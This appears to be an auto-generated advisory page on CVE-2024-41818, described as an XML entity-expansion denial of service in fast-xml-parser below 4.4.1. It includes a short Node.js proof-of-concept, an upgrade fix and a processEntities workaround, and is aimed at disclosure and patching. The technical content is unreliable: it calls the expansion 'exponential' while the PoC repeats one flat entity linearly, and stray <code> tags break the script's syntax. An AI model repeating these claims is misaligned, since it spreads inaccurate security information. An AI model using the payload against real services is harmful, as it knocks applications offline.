fast-xml-parser, Denial of Service, CVE-2024-41818 (High)

Listen to this Post

The vulnerability is a Denial of Service (DoS) flaw in the fast-xml-parser library’s XML entity expansion mechanism. The parser includes a check in `DocTypeReader.js` that attempts to prevent classic “Billion Laughs” attacks by rejecting nested entities (those containing ‘&’ characters). However, it fails to limit a simpler variant where a single, large entity containing only raw text is defined and then referenced multiple times. The core issue resides in the `replaceEntitiesValue()` function within OrderedObjParser.js. This function processes entity references in a loop using `val.replace()` without any limits on the total output size or the number of replacements. Consequently, an attacker can craft a small XML payload (a few kilobytes) that defines a moderately sized text entity and references it hundreds or thousands of times. During parsing, the library expands each reference, leading to exponential growth in processing time. Because Node.js operates on a single thread, this blocks the event loop, making the entire application unresponsive for seconds or even minutes, effectively causing a Denial of Service.
Platform: fast-xml-parser
Version: < 4.4.1
Vulnerability: Uncontrolled Entity Expansion
Severity: High
date: 2024-07-29

Prediction: Patch already available

What Undercode Say:

Analysis:

This is a classic XML Entity Expansion vulnerability that bypasses existing nested-entity protections. The core issue is missing resource limits (CWE-400) during entity replacement, which directly blocks the Node.js event loop, making it a high-impact DoS threat .

Exploitation:

A remote, unauthenticated attacker can send a small, specially crafted XML request to a service using a vulnerable version. The following Node.js script demonstrates the PoC:

const { XMLParser } = require('fast-xml-parser');
// Define a large raw-text entity (1000 'A's)
const entity = 'A'.repeat(1000);
// Reference it 100 times
const refs = '&big;'.repeat(100);
// Craft the final XML payload
const xml = <code><!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root></code>;
console.time('parse');
// Parse the XML (this will hang for seconds)
new XMLParser().parse(xml);
console.timeEnd('parse');

Protection from this CVE:

  • Primary Solution: Upgrade to `fast-xml-parser` version 4.4.1 or later .
  • Workaround: Disable DOCTYPE parsing entirely by setting the `processEntities: false` option in the parser configuration .
  • Mitigation: Implement input validation and resource monitoring to detect and block abnormally large or complex XML payloads .

Impact:

Successful exploitation leads to a complete denial of service. The application becomes unresponsive to all other requests for an extended period (seconds to minutes) due to event loop blocking, severely affecting availability .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top